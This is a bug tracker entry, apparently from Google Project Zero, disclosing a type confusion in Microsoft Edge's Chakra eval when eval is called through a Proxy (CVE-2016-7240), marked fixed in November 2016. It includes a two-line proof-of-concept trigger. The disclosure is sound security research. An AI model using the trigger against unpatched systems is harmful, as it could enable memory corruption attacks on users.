New issue
Advanced search Search tips
Starred by 3 users
Status: Fixed
Owner:
Closed: Nov 2016
Cc:



Sign in to add a comment
Microsoft Edge: Type Confusion in eval
Project Member Reported by natashenka@google.com, Sep 19 2016 Back to list
In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

var p = new Proxy(eval, {});
p("alert(\"e\")"); 

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
functiontrap.html
93 bytes View Download
Project Member Comment 1 by natashenka@google.com, Nov 17 2016
Labels: -Restrict-View-Commit CVE-2016-7240
Status: Fixed
Fixed in November update
Sign in to add a comment